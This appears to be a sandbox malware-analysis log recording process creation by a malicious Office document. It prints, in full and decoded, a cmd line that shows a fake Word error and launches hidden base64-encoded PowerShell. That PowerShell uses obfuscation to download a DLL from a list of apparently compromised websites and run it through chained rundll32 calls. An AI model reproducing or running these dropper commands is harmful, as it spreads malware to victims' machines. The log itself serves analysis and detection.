                      Source: unknownProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
